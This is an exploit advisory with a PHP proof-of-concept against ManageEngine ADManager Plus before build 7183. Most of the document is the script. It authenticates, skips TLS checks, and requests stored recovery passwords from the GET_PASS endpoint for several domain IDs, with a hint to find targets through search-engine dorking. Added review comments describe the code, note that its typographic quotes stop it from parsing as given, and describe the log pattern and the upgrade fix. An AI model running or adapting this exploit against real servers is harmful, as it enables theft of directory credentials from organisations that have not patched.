ManageEngine ADManager 7183 Password Hash Disclosure

=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] ManageEngine ADManager Plus versions prior to build 7183 suffer from a password hash disclosure vulnerability.

[+] Save the code as poc.php.

[+] Usage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>

[+] PayLoad :

<?php

// Silence all PHP diagnostics (original comment: "disable HTTPS warnings").
// NOTE(review): level 0 hides every warning and notice, not only TLS-related
// ones, so any failure in the curl_* calls below shows up only as a false or
// empty result rather than a message.
error_reporting(0);

/**
 * Log in to an ADManager Plus instance and then request the stored recovery
 * password for domainId 1 through 5 from ConfigureRecoverySettings/GET_PASS.
 *
 * @param string $target   Base URL of the instance. The paths below are
 *                         concatenated directly, so it is expected to end in '/'.
 * @param string $auth     Value sent as domainName; the shorthand 'admanager'
 *                         is expanded to 'ADManager Plus Authentication'.
 * @param string $user     Login name sent as j_username.
 * @param string $password Password sent as j_password.
 * @return void            Output is echoed; on login failure the whole process
 *                         exits (exit code 0 for bad credentials, 1 otherwise).
 *
 * NOTE(review): as pasted, every string literal is delimited by typographic
 * quotes (‘ ’ “ ”) rather than ' or ", so this listing does not parse as PHP;
 * it is reproduced byte-for-byte here with only the comments changed.
 *
 * Defender's view: the traffic this produces is a POST to
 * j_security_check?LogoutFromSSO=true followed by GETs to
 * ConfigureRecoverySettings/GET_PASS?req={"domainId":"N"} from the same
 * client. The advisory header states builds prior to 7183 are affected, so
 * updating to 7183 or later is the fix, and that request sequence is the
 * pattern to look for in the product's web access logs.
 */
function getPass($target, $auth, $user, $password) {
// Create one cURL handle; it is reused for the login and every GET_PASS request.
$ch = curl_init();

// Expand the shorthand auth name to the full domainName value.
// NOTE(review): loose == is used; both operands are strings here, so it behaves
// like === in this case, but === is the idiomatic form.
if (strtolower($auth) == ‘admanager’) {
$auth = ‘ADManager Plus Authentication’;
}

// Form-encoded login body for the j_security_check endpoint.
$data = http_build_query([
“is_admp_pass_encrypted” => “false”,
“j_username” => $user,
“j_password” => $password,
“domainName” => $auth,
“AUTHRULE_NAME” => “ADAuthenticator”
]);

// Request settings: POST the login form, return the body, follow redirects.
// NOTE(review): CURLOPT_SSL_VERIFYHOST / CURLOPT_SSL_VERIFYPEER are both
// false, so the TLS peer is not authenticated and the submitted credentials
// are sent to whatever answers at $target.
$url = $target . ‘j_security_check?LogoutFromSSO=true’;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
“User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0”,
“Content-Type: application/x-www-form-urlencoded”
]);

// Send the login request.
$response = curl_exec($ch);

// Classify the login result. Success is inferred from the substring 'Cookie'
// appearing in the returned body (presumably the body of the final response
// after redirects); a 200 without it is reported as bad credentials, and any
// other status as a generic error. Both failure branches terminate the process.
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strpos($response, ‘Cookie’) !== false) {
echo “[+] Authentication successful!\n”;
} elseif ($http_code == 200) {
echo “[-] Invalid login name/password!\n”;
exit(0); // exits the whole script, not just this function
} else {
echo “[-] Something went wrong!\n”;
exit(1);
}

// Ask GET_PASS for domainId 1..5 (a fixed range). The req parameter is the
// URL-encoded JSON {"domainId":"<i>"}.
for ($i = 1; $i <= 5; $i++) {
echo “[*] Trying to fetch recovery password for domainId: $i!\n”;
$passUrl = $target . ‘ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22’ . $i . ‘%22%7D’;
curl_setopt($ch, CURLOPT_URL, $passUrl);
curl_setopt($ch, CURLOPT_POST, false); // intended to switch the reused handle back to GET
$passResponse = curl_exec($ch);

// A false or empty body is skipped silently; error_reporting(0) hides the cause.
if ($passResponse) {
echo $passResponse . “\n”;
}
}

curl_close($ch);
}

/**
 * Parse the command line into the four named options this script understands.
 *
 * Recognised flags: -t/--target, -a/--auth, -u/--user, -p/--password. Each
 * consumes the following token as its value; any other token is ignored.
 *
 * @return array{target:string,auth:string,user:string,password:string}
 *         Every key is present; unspecified options keep their default.
 *
 * NOTE(review): reads $argv via `global`, so this only works when run from
 * the CLI. If a flag is the last token, `$argv[++$i]` reads past the end of
 * the array and the option gets null (the undefined-offset notice is hidden
 * by error_reporting(0) at the top of the file).
 * NOTE(review): the lone ” after each => below is presumably an empty ''
 * rendered with typographic quotes; the listing is kept byte-for-byte.
 */
function get_args() {
global $argv;

// Defaults: every option starts empty so main() can detect missing ones.
$args = [
‘target’ => ”,
‘auth’ => ”,
‘user’ => ”,
‘password’ => ”
];

// $argv[0] is the script name, so scanning starts at 1. ++$i skips the value
// token so it is not re-examined as a flag on the next iteration.
for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case ‘-t’:
case ‘–target’:
$args[‘target’] = $argv[++$i];
break;
case ‘-a’:
case ‘–auth’:
$args[‘auth’] = $argv[++$i];
break;
case ‘-u’:
case ‘–user’:
$args[‘user’] = $argv[++$i];
break;
case ‘-p’:
case ‘–password’:
$args[‘password’] = $argv[++$i];
break;
}
}

return $args;
}

/**
 * Entry point: validate the parsed options and hand them to getPass().
 *
 * Exits with status 1 and prints usage when any option is missing.
 *
 * NOTE(review): the check uses truthiness, so a value such as "0" is treated
 * as missing. The usage text names exploit.php while the instructions above
 * the listing say to save the file as poc.php.
 */
function main() {
$args = get_args();
if (!$args[‘target’] || !$args[‘auth’] || !$args[‘user’] || !$args[‘password’]) {
echo “Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n”;
exit(1);
}

getPass($args[‘target’], $args[‘auth’], $args[‘user’], $args[‘password’]);
}

// Script entry: runs unconditionally when the file is executed.
main();

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
